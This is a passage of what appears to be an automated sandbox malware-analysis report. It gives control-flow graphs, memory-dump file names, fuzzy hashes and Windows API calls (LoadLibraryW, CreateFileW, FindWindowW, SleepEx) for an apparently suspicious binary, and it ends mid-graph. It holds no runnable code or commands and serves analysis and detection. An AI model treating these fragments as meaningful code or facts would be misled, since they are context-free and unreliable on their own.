                                                                                      control_flow_graph 1263 7ff70b923030-7ff70b92306b 1264 7ff70b923080-7ff70b923085 1263->1264 1265 7ff70b92308b-7ff70b923090 1264->1265 1266 7ff70b923140-7ff70b923145 1264->1266 1269 7ff70b9231e0-7ff70b9231e5 1265->1269 1270 7ff70b923096-7ff70b92309b 1265->1270 1267 7ff70b92314b-7ff70b923150 1266->1267 1268 7ff70b923240-7ff70b923245 1266->1268 1273 7ff70b9232bd-7ff70b9232c2 1267->1273 1274 7ff70b923156-7ff70b92315b 1267->1274 1271 7ff70b92324b-7ff70b923250 1268->1271 1272 7ff70b92332e-7ff70b923333 1268->1272 1275 7ff70b9231eb-7ff70b9231f0 1269->1275 1276 7ff70b9232f6-7ff70b9232fb 1269->1276 1277 7ff70b9230a1-7ff70b9230a6 1270->1277 1278 7ff70b923286-7ff70b92328b 1270->1278 1281 7ff70b92306d-7ff70b92307f 1271->1281 1282 7ff70b923256-7ff70b92325b 1271->1282 1285 7ff70b9234a8-7ff70b9234b7 1272->1285 1286 7ff70b923339-7ff70b92333e 1272->1286 1291 7ff70b9232c8-7ff70b9232cd 1273->1291 1292 7ff70b923447-7ff70b923458 1273->1292 1283 7ff70b9233bb-7ff70b9233db call 7ff70b945870 1274->1283 1284 7ff70b923161-7ff70b923166 1274->1284 1289 7ff70b92338c-7ff70b923391 1275->1289 1290 7ff70b9231f6-7ff70b9231fb 1275->1290 1279 7ff70b923301-7ff70b923306 1276->1279 1280 7ff70b923474-7ff70b923489 1276->1280 1293 7ff70b9230ac-7ff70b9230b1 1277->1293 1294 7ff70b923366-7ff70b92336b 1277->1294 1287 7ff70b923291-7ff70b923296 1278->1287 1288 7ff70b923416-7ff70b923427 1278->1288 1306 7ff70b92330c-7ff70b923311 1279->1306 1307 7ff70b92348e-7ff70b9234a3 1279->1307 1280->1264 1281->1264 1296 7ff70b923261-7ff70b923266 1282->1296 1297 7ff70b923404-7ff70b923411 1282->1297 1283->1264 1308 7ff70b92316c-7ff70b923171 1284->1308 1309 7ff70b9233e0-7ff70b9233f5 1284->1309 1300 7ff70b9234b9 1285->1300 1301 7ff70b9234be-7ff70b9234c8 1285->1301 1310 7ff70b9234cd-7ff70b9234e5 1286->1310 1311 7ff70b923344-7ff70b923349 1286->1311 1298 7ff70b92342c-7ff70b923437 1287->1298 1299 7ff70b92329c-7ff70b9232a1 1287->1299 1288->1264 1314 7ff70b9234f7-7ff70b9234fc 1289->1314 1315 7ff70b923397-7ff70b9233ac 1289->1315 1316 7ff70b9233fa-7ff70b9233ff 1290->1316 1317 7ff70b923201-7ff70b923206 1290->1317 1302 7ff70b92345d-7ff70b92346f 1291->1302 1303 7ff70b9232d3-7ff70b9232d8 1291->1303 1292->1264 1304 7ff70b9230b7-7ff70b9230bc 1293->1304 1305 7ff70b9233b1-7ff70b9233b6 1293->1305 1312 7ff70b9234ea-7ff70b9234ef 1294->1312 1313 7ff70b923371-7ff70b923387 1294->1313 1296->1264 1319 7ff70b92326c-7ff70b923276 1296->1319 1297->1264 1298->1264 1320 7ff70b92343d-7ff70b923442 1298->1320 1299->1264 1321 7ff70b9232a7-7ff70b9232b8 FindCloseChangeNotification 1299->1321 1300->1301 1301->1264 1302->1264 1303->1264 1322 7ff70b9232de-7ff70b9232f1 1303->1322 1304->1264 1323 7ff70b9230be-7ff70b923120 1304->1323 1305->1264 1306->1264 1325 7ff70b923317-7ff70b923329 call 7ff70b8e5770 1306->1325 1307->1264 1308->1264 1327 7ff70b923177-7ff70b9231c5 1308->1327 1309->1264 1310->1264 1311->1264 1328 7ff70b92334f-7ff70b923361 1311->1328 1312->1264 1324 7ff70b9234f5 1312->1324 1313->1264 1314->1264 1326 7ff70b923502 call 7ff70b9447d0 1314->1326 1315->1264 1316->1264 1317->1264 1329 7ff70b92320c-7ff70b923222 call 7ff70b924370 1317->1329 1319->1264 1331 7ff70b92327c-7ff70b923281 1319->1331 1320->1264 1321->1264 1322->1264 1332 7ff70b923127-7ff70b923131 1323->1332 1333 7ff70b923122 1323->1333 1334 7ff70b923507-7ff70b923522 1324->1334 1325->1264 1326->1334 1327->1264 1337 7ff70b9231cb-7ff70b9231d0 1327->1337 1328->1264 1329->1264 1340 7ff70b923228-7ff70b92322d 1329->1340 1331->1264 1332->1264 1333->1332 1337->1264 1340->1264
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "Yba$"Yba$JC<.$KC<.$KC<.$fkB2$gkB2$gkB2
                                                                                      • API String ID: 0-2770720463
                                                                                      • Opcode ID: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
                                                                                      • Instruction ID: 8628181d2725a400d7690dc80100a83cf90a92241bcbf56745cdf43202f2e884
                                                                                      • Opcode Fuzzy Hash: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
                                                                                      • Instruction Fuzzy Hash: 71B1D422E2E745D9E974571DE88073EA250EF45790FA10236E98FC3774CF2DD58087A6

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1341 7ff70b93ff60-7ff70b93ffa5 1342 7ff70b93ffc0-7ff70b93ffc5 1341->1342 1343 7ff70b93ffc7-7ff70b93ffcc 1342->1343 1344 7ff70b940010-7ff70b940015 1342->1344 1345 7ff70b93ffd2-7ff70b93ffd7 1343->1345 1346 7ff70b940060-7ff70b940065 1343->1346 1347 7ff70b94001b-7ff70b940020 1344->1347 1348 7ff70b9400d0-7ff70b9400d5 1344->1348 1351 7ff70b94010d-7ff70b940112 1345->1351 1352 7ff70b93ffdd-7ff70b93ffe2 1345->1352 1349 7ff70b94006b-7ff70b940070 1346->1349 1350 7ff70b940192-7ff70b940197 1346->1350 1355 7ff70b94013c-7ff70b940141 1347->1355 1356 7ff70b940026-7ff70b94002b 1347->1356 1353 7ff70b9401c7-7ff70b9401cc 1348->1353 1354 7ff70b9400db-7ff70b9400e0 1348->1354 1363 7ff70b940076-7ff70b94007b 1349->1363 1364 7ff70b940275-7ff70b9402b3 call 7ff70b9259d0 1349->1364 1369 7ff70b94019d-7ff70b9401a2 1350->1369 1370 7ff70b940401-7ff70b94046b 1350->1370 1361 7ff70b940118-7ff70b94011d 1351->1361 1362 7ff70b9402fe-7ff70b9403a6 FindWindowW 1351->1362 1367 7ff70b93ffe8-7ff70b93ffed 1352->1367 1368 7ff70b9401eb-7ff70b9401f0 1352->1368 1359 7ff70b9401d2-7ff70b9401d7 1353->1359 1360 7ff70b94047f-7ff70b9404af call 7ff70b925100 1353->1360 1371 7ff70b9402e9-7ff70b9402f9 1354->1371 1372 7ff70b9400e6-7ff70b9400eb 1354->1372 1365 7ff70b940147-7ff70b94014c 1355->1365 1366 7ff70b9403cb-7ff70b9403e7 1355->1366 1357 7ff70b940237-7ff70b940247 1356->1357 1358 7ff70b940031-7ff70b940036 1356->1358 1357->1342 1382 7ff70b94024c-7ff70b940270 1358->1382 1383 7ff70b94003c-7ff70b940041 1358->1383 1384 7ff70b9401dd-7ff70b9401e6 1359->1384 1385 7ff70b9404b4-7ff70b9404b9 1359->1385 1360->1342 1373 7ff70b9403ab-7ff70b9403c6 1361->1373 1374 7ff70b940123-7ff70b940128 1361->1374 1362->1342 1386 7ff70b9402b8-7ff70b9402e4 1363->1386 1387 7ff70b940081-7ff70b940086 1363->1387 1364->1342 1376 7ff70b9403ec-7ff70b9403fc 1365->1376 1377 7ff70b940152-7ff70b940157 1365->1377 1366->1342 1378 7ff70b9401f5-7ff70b940232 call 7ff70b925260 1367->1378 1379 7ff70b93fff3-7ff70b93fff8 1367->1379 1368->1342 1380 7ff70b9401a8-7ff70b9401ad 1369->1380 1381 7ff70b940470-7ff70b94047a 1369->1381 1370->1342 1371->1342 1389 7ff70b93ffa7-7ff70b93ffb3 1372->1389 1390 7ff70b9400f1-7ff70b9400f6 1372->1390 1373->1342 1374->1342 1392 7ff70b94012e-7ff70b940137 1374->1392 1376->1342 1377->1342 1394 7ff70b94015d-7ff70b94018d call 7ff70b925100 1377->1394 1378->1342 1379->1342 1396 7ff70b93fffa-7ff70b94000d 1379->1396 1380->1342 1397 7ff70b9401b3-7ff70b9401b7 1380->1397 1381->1342 1382->1342 1383->1342 1398 7ff70b940047-7ff70b94005a 1383->1398 1384->1342 1385->1342 1395 7ff70b9404bf-7ff70b9404d9 1385->1395 1386->1342 1387->1342 1400 7ff70b94008c-7ff70b9400c5 call 7ff70b9447d0 * 2 1387->1400 1389->1342 1390->1342 1391 7ff70b9400fc-7ff70b940108 1390->1391 1391->1342 1402 7ff70b9401bc-7ff70b9401c2 1392->1402 1394->1342 1396->1342 1397->1402 1398->1342 1400->1342 1402->1342
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %<L,$%<L,$-YV$-YV$-YV
                                                                                      • API String ID: 0-1602977039
                                                                                      • Opcode ID: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
                                                                                      • Instruction ID: 080f6f4b0b62c043d0f13db7cdb3ed0296775c97b8822189772e1db0efb082b8
                                                                                      • Opcode Fuzzy Hash: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
                                                                                      • Instruction Fuzzy Hash: D1D10626E24B55C6EB609B2DDC807BD62A0BF19788F604532EE4ED3778DF38D6818350

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1411 7ff70b945870-7ff70b94588e 1412 7ff70b9458a0-7ff70b9458a5 1411->1412 1413 7ff70b9458a7-7ff70b9458ac 1412->1413 1414 7ff70b945900-7ff70b945905 1412->1414 1417 7ff70b9458b2-7ff70b9458b7 1413->1417 1418 7ff70b945980-7ff70b945985 1413->1418 1415 7ff70b94590b-7ff70b945910 1414->1415 1416 7ff70b9459c0-7ff70b9459c5 1414->1416 1419 7ff70b945a2e-7ff70b945a33 1415->1419 1420 7ff70b945916-7ff70b94591b 1415->1420 1425 7ff70b9459cb-7ff70b9459d0 1416->1425 1426 7ff70b945a80-7ff70b945a85 1416->1426 1423 7ff70b9458bd-7ff70b9458c2 1417->1423 1424 7ff70b9459eb-7ff70b9459f0 1417->1424 1421 7ff70b945a4b-7ff70b945a50 1418->1421 1422 7ff70b94598b-7ff70b945990 1418->1422 1431 7ff70b945bd9-7ff70b945be8 1419->1431 1432 7ff70b945a39-7ff70b945a3e 1419->1432 1429 7ff70b945aea-7ff70b945b0b 1420->1429 1430 7ff70b945921-7ff70b945926 1420->1430 1433 7ff70b945bed-7ff70b945c15 RtlRestoreThreadPreferredUILanguages 1421->1433 1434 7ff70b945a56-7ff70b945a5b 1421->1434 1435 7ff70b945890-7ff70b945895 1422->1435 1436 7ff70b945996-7ff70b94599b 1422->1436 1437 7ff70b9458c8-7ff70b9458cd 1423->1437 1438 7ff70b945ab0-7ff70b945ac1 1423->1438 1427 7ff70b9459f6-7ff70b9459fb 1424->1427 1428 7ff70b945bb3-7ff70b945bd4 1424->1428 1441 7ff70b945b9f-7ff70b945bae 1425->1441 1442 7ff70b9459d6-7ff70b9459db 1425->1442 1439 7ff70b945c1a-7ff70b945c1f 1426->1439 1440 7ff70b945a8b-7ff70b945a90 1426->1440 1427->1412 1451 7ff70b945a01-7ff70b945a29 1427->1451 1428->1412 1443 7ff70b945b0d 1429->1443 1444 7ff70b945b13-7ff70b945b22 1429->1444 1445 7ff70b945b27-7ff70b945b4f 1430->1445 1446 7ff70b94592c-7ff70b945931 1430->1446 1431->1412 1432->1412 1452 7ff70b945a44-7ff70b945a46 1432->1452 1433->1412 1434->1412 1453 7ff70b945a61-7ff70b945a7b 1434->1453 1435->1412 1447 7ff70b9459a1-7ff70b9459a6 1436->1447 1448 7ff70b945b54-7ff70b945b79 1436->1448 1454 7ff70b945ac6-7ff70b945ae5 1437->1454 1455 7ff70b9458d3-7ff70b9458d8 1437->1455 1438->1412 1439->1412 1440->1412 1456 7ff70b945a96-7ff70b945aa0 1440->1456 1441->1412 1449 7ff70b9459e1-7ff70b9459e6 1442->1449 1450 7ff70b945c24-7ff70b945c29 1442->1450 1443->1444 1444->1412 1445->1412 1446->1412 1457 7ff70b945937-7ff70b945964 1446->1457 1447->1412 1460 7ff70b9459ac-7ff70b9459b1 1447->1460 1458 7ff70b945b7b 1448->1458 1459 7ff70b945b81-7ff70b945b87 1448->1459 1449->1412 1450->1412 1461 7ff70b945c2f-7ff70b945c35 1450->1461 1451->1412 1452->1412 1453->1412 1454->1412 1455->1412 1462 7ff70b9458da-7ff70b9458f3 1455->1462 1456->1412 1463 7ff70b945aa6-7ff70b945aab 1456->1463 1464 7ff70b94596c-7ff70b94597a 1457->1464 1465 7ff70b945966 1457->1465 1458->1459 1466 7ff70b945b89 1459->1466 1467 7ff70b945b8f-7ff70b945b91 1459->1467 1460->1412 1462->1412 1463->1412 1464->1412 1465->1464 1466->1467 1467->1412 1469 7ff70b945b97-7ff70b945b9a 1467->1469 1469->1412
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: +I}$+I}
                                                                                      • API String ID: 0-3898140586
                                                                                      • Opcode ID: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
                                                                                      • Instruction ID: 75c02c0ba1b09adabf5d7879d2d57cf7c2c51c73a9628ed5c1de84ae59650fbf
                                                                                      • Opcode Fuzzy Hash: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
                                                                                      • Instruction Fuzzy Hash: 6581E825E3C101C7E974A7AD698093AA6909FA5350FE51236E90FC77F0CFADEA404721

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1470 7ff70b8d4970-7ff70b8d4a09 1471 7ff70b8d4a60-7ff70b8d4a65 1470->1471 1472 7ff70b8d4aa0-7ff70b8d4aa5 1471->1472 1473 7ff70b8d4a67-7ff70b8d4a6c 1471->1473 1476 7ff70b8d4ba5-7ff70b8d4bb4 call 7ff70b93f520 1472->1476 1477 7ff70b8d4aab-7ff70b8d4ab0 1472->1477 1474 7ff70b8d4a0b-7ff70b8d4a17 SleepEx call 7ff70b93f520 1473->1474 1475 7ff70b8d4a6e-7ff70b8d4a73 1473->1475 1486 7ff70b8d4a1c-7ff70b8d4a52 1474->1486 1480 7ff70b8d4b42-7ff70b8d4ba0 1475->1480 1481 7ff70b8d4a79-7ff70b8d4a7e 1475->1481 1476->1471 1482 7ff70b8d4ab6-7ff70b8d4b2b call 7ff70b922f40 1477->1482 1483 7ff70b8d4bb9-7ff70b8d4bbe 1477->1483 1480->1471 1481->1471 1488 7ff70b8d4a80-7ff70b8d4a91 1481->1488 1489 7ff70b8d4b30-7ff70b8d4b3d 1482->1489 1483->1471 1487 7ff70b8d4bc4-7ff70b8d4bec 1483->1487 1486->1471 1488->1471 1489->1471
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .4[$ .4[
                                                                                      • API String ID: 0-1397926279
                                                                                      • Opcode ID: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
                                                                                      • Instruction ID: 4f14b4dbb1322f0be5d70c6b6c6044b8c3e07734f17cd81d671756f2da35df9b
                                                                                      • Opcode Fuzzy Hash: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
                                                                                      • Instruction Fuzzy Hash: A6510D12A1AB8885E9115B3EA8413A9E3A0BF99794F944332FD8D93771DF3CE6D18700

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1490 7ff70b8e88f7-7ff70b8e88fc 1491 7ff70b8e8902-7ff70b8e8907 1490->1491 1492 7ff70b8e92d0-7ff70b8e92d5 1490->1492 1493 7ff70b8e890d-7ff70b8e8912 1491->1493 1494 7ff70b8e9adc-7ff70b8e9b34 call 7ff70b946310 1491->1494 1495 7ff70b8ea52d-7ff70b8ea562 1492->1495 1496 7ff70b8e92db-7ff70b8e92e0 1492->1496 1498 7ff70b8e9b39-7ff70b8e9b46 1493->1498 1499 7ff70b8e8918-7ff70b8e891d 1493->1499 1503 7ff70b8e8380-7ff70b8e83a6 1494->1503 1501 7ff70b8ea56a-7ff70b8ea59c 1495->1501 1500 7ff70b8e92e6-7ff70b8e92eb 1496->1500 1496->1501 1505 7ff70b8e9b50-7ff70b8e9b6d 1498->1505 1506 7ff70b8e9b48 1498->1506 1499->1503 1507 7ff70b8e8923-7ff70b8e8947 1499->1507 1502 7ff70b8e92f1-7ff70b8e9302 1500->1502 1500->1503 1508 7ff70b8e9304 1502->1508 1509 7ff70b8e930c-7ff70b8e9323 LoadLibraryW 1502->1509 1513 7ff70b8e8781-7ff70b8e8786 1503->1513 1514 7ff70b8e83ac-7ff70b8e83b1 1503->1514 1505->1503 1506->1505 1507->1503 1508->1509 1509->1503 1517 7ff70b8e8ca4-7ff70b8e8ca9 1513->1517 1518 7ff70b8e878c-7ff70b8e8791 1513->1518 1515 7ff70b8e83b7-7ff70b8e83bc 1514->1515 1516 7ff70b8e89e8-7ff70b8e89ed 1514->1516 1519 7ff70b8e83c2-7ff70b8e83c7 1515->1519 1520 7ff70b8e8f10-7ff70b8e8f15 1515->1520 1525 7ff70b8e89f3-7ff70b8e89f8 1516->1525 1526 7ff70b8e93b4-7ff70b8e93b9 1516->1526 1521 7ff70b8e8caf-7ff70b8e8cb4 1517->1521 1522 7ff70b8e959c-7ff70b8e95a1 1517->1522 1523 7ff70b8e91a0-7ff70b8e91a5 1518->1523 1524 7ff70b8e8797-7ff70b8e879c 1518->1524 1531 7ff70b8e83cd-7ff70b8e83d2 1519->1531 1532 7ff70b8e979b-7ff70b8e97fd 1519->1532 1537 7ff70b8ea152-7ff70b8ea16c call 7ff70b945870 1520->1537 1538 7ff70b8e8f1b-7ff70b8e8f20 1520->1538 1533 7ff70b8e9fbd-7ff70b8e9fcc 1521->1533 1534 7ff70b8e8cba-7ff70b8e8cbf 1521->1534 1539 7ff70b8ea752-7ff70b8ea7c8 1522->1539 1540 7ff70b8e95a7-7ff70b8e95ac 1522->1540 1529 7ff70b8ea3b6-7ff70b8ea3db 1523->1529 1530 7ff70b8e91ab-7ff70b8e91b0 1523->1530 1541 7ff70b8e87a2-7ff70b8e87a7 1524->1541 1542 7ff70b8e999b-7ff70b8e99c2 1524->1542 1527 7ff70b8e89fe-7ff70b8e8a03 1525->1527 1528 7ff70b8e9c0b-7ff70b8e9c1d 1525->1528 1535 7ff70b8ea665-7ff70b8ea67e 1526->1535 1536 7ff70b8e93bf-7ff70b8e93c4 1526->1536 1543 7ff70b8e9c22-7ff70b8e9c53 1527->1543 1544 7ff70b8e8a09-7ff70b8e8a0e 1527->1544 1528->1503 1529->1503 1552 7ff70b8e91b6-7ff70b8e91bb 1530->1552 1553 7ff70b8ea3e0-7ff70b8ea425 call 7ff70b945750 1530->1553 1545 7ff70b8e9802-7ff70b8e9807 1531->1545 1546 7ff70b8e83d8-7ff70b8e83dd 1531->1546 1559 7ff70b8ea4e5-7ff70b8ea4fa 1532->1559 1533->1503 1547 7ff70b8e8cc5-7ff70b8e8cca 1534->1547 1548 7ff70b8e9fd1-7ff70b8e9fd6 1534->1548 1535->1503 1554 7ff70b8ea683-7ff70b8ea695 1536->1554 1555 7ff70b8e93ca-7ff70b8e93cf 1536->1555 1537->1503 1550 7ff70b8e8f26-7ff70b8e8f2b 1538->1550 1551 7ff70b8ea171-7ff70b8ea18a 1538->1551 1539->1503 1540->1503 1556 7ff70b8e95b2-7ff70b8e95c6 1540->1556 1557 7ff70b8e87ad-7ff70b8e87b2 1541->1557 1558 7ff70b8e99c7-7ff70b8e99e9 call 7ff70b926e50 1541->1558 1542->1503 1543->1503 1544->1503 1561 7ff70b8e8a14-7ff70b8e8a2f 1544->1561 1545->1503 1546->1503 1562 7ff70b8e83df-7ff70b8e8416 call 7ff70b945750 1546->1562 1547->1503 1563 7ff70b8e8cd0-7ff70b8e8cd5 1547->1563 1548->1503 1550->1503 1565 7ff70b8e8f31-7ff70b8e8f52 1550->1565 1551->1503 1552->1503 1567 7ff70b8e91c1-7ff70b8e91ce 1552->1567 1553->1503 1553->1559 1554->1503 1555->1503 1568 7ff70b8e93d5-7ff70b8e9416 1555->1568 1556->1503 1557->1503 1569 7ff70b8e87b8-7ff70b8e87ca 1557->1569 1558->1503 1559->1503 1561->1503 1562->1503 1563->1503 1572 7ff70b8e8f54 1565->1572 1573 7ff70b8e8f5c-7ff70b8e8f90 call 7ff70b8ea9d0 call 7ff70b8dcff0 1565->1573 1567->1503 1568->1503 1569->1503 1572->1573 1573->1503
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: H]c
                                                                                      • API String ID: 1029625771-2876529112
                                                                                      • Opcode ID: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
                                                                                      • Instruction ID: 391594b6c0534b19ee405bdc4fce077a2775e197f3c3e27112aa76de5ccdea06
                                                                                      • Opcode Fuzzy Hash: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
                                                                                      • Instruction Fuzzy Hash: 5651847260C68681DE749A9CA8947BEA390EF84754F900632D6BEC77F4CF3CD5508BA1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1580 7ff70b922ba0-7ff70b922bc0 1581 7ff70b922c10-7ff70b922c15 1580->1581 1582 7ff70b922c17-7ff70b922c1c 1581->1582 1583 7ff70b922c50-7ff70b922c55 1581->1583 1586 7ff70b922c1e-7ff70b922c23 1582->1586 1587 7ff70b922c90-7ff70b922c95 1582->1587 1584 7ff70b922c57-7ff70b922c5c 1583->1584 1585 7ff70b922cc3-7ff70b922cc8 1583->1585 1588 7ff70b922d02-7ff70b922d13 1584->1588 1589 7ff70b922c62-7ff70b922c67 1584->1589 1592 7ff70b922d37-7ff70b922d44 1585->1592 1593 7ff70b922cca-7ff70b922ccf 1585->1593 1594 7ff70b922c29-7ff70b922c2e 1586->1594 1595 7ff70b922ce2-7ff70b922ce7 1586->1595 1590 7ff70b922c9b-7ff70b922ca0 1587->1590 1591 7ff70b922d22-7ff70b922d32 1587->1591 1588->1581 1596 7ff70b922d18-7ff70b922d1d 1589->1596 1597 7ff70b922c6d-7ff70b922c72 1589->1597 1598 7ff70b922bc2-7ff70b922c02 CreateFileW 1590->1598 1599 7ff70b922ca6-7ff70b922cab 1590->1599 1591->1581 1592->1581 1600 7ff70b922d49-7ff70b922d4e 1593->1600 1601 7ff70b922cd1-7ff70b922cdd 1593->1601 1602 7ff70b922cec-7ff70b922cfd 1594->1602 1603 7ff70b922c34-7ff70b922c39 1594->1603 1595->1581 1596->1581 1597->1581 1606 7ff70b922c74-7ff70b922c85 1597->1606 1598->1581 1599->1581 1608 7ff70b922cb1-7ff70b922cbe 1599->1608 1600->1581 1607 7ff70b922d54-7ff70b922d63 1600->1607 1601->1581 1602->1581 1603->1581 1604 7ff70b922c3b-7ff70b922c4c 1603->1604 1604->1581 1606->1581 1608->1581
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: phV
                                                                                      • API String ID: 0-1350728776
                                                                                      • Opcode ID: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
                                                                                      • Instruction ID: 70be7b2d55a8bcb389ccc60af2850bf99272224967da70bab795e3516d810c8d
                                                                                      • Opcode Fuzzy Hash: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
                                                                                      • Instruction Fuzzy Hash: 7841C121E28542C1EA70971CDC81339B680AF557B4FA50A72EE6ED73F0CB68DAD04362

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1609 7ff70b8d6a50-7ff70b8d6aaa call 7ff70b8ceb50 1612 7ff70b8d6ad0-7ff70b8d6ad7 1609->1612 1613 7ff70b8d6b50-7ff70b8d6b56 1612->1613 1614 7ff70b8d6ad9-7ff70b8d6adf 1612->1614 1615 7ff70b8d6c10-7ff70b8d6c16 1613->1615 1616 7ff70b8d6b5c-7ff70b8d6b62 1613->1616 1617 7ff70b8d6ae5-7ff70b8d6aeb 1614->1617 1618 7ff70b8d6bc0-7ff70b8d6bc6 1614->1618 1623 7ff70b8d6c1c-7ff70b8d6c22 1615->1623 1624 7ff70b8d6cf7-7ff70b8d6cfd 1615->1624 1619 7ff70b8d6c7c-7ff70b8d6c82 1616->1619 1620 7ff70b8d6b68-7ff70b8d6b6e 1616->1620 1625 7ff70b8d6af1-7ff70b8d6af7 1617->1625 1626 7ff70b8d6c4c-7ff70b8d6c52 1617->1626 1621 7ff70b8d6bcc-7ff70b8d6bd2 1618->1621 1622 7ff70b8d6cc7-7ff70b8d6ccd 1618->1622 1633 7ff70b8d6e4b-7ff70b8d6e51 1619->1633 1634 7ff70b8d6c88-7ff70b8d6c8e 1619->1634 1631 7ff70b8d6b74-7ff70b8d6b7a 1620->1631 1632 7ff70b8d6d8a-7ff70b8d6d90 1620->1632 1635 7ff70b8d6ddf-7ff70b8d6de5 1621->1635 1636 7ff70b8d6bd8-7ff70b8d6bde 1621->1636 1637 7ff70b8d6cd3-7ff70b8d6cd9 1622->1637 1638 7ff70b8d6eea-7ff70b8d6efe 1622->1638 1639 7ff70b8d6e03-7ff70b8d6e09 1623->1639 1640 7ff70b8d6c28-7ff70b8d6c2e 1623->1640 1627 7ff70b8d6f03-7ff70b8d6f16 1624->1627 1628 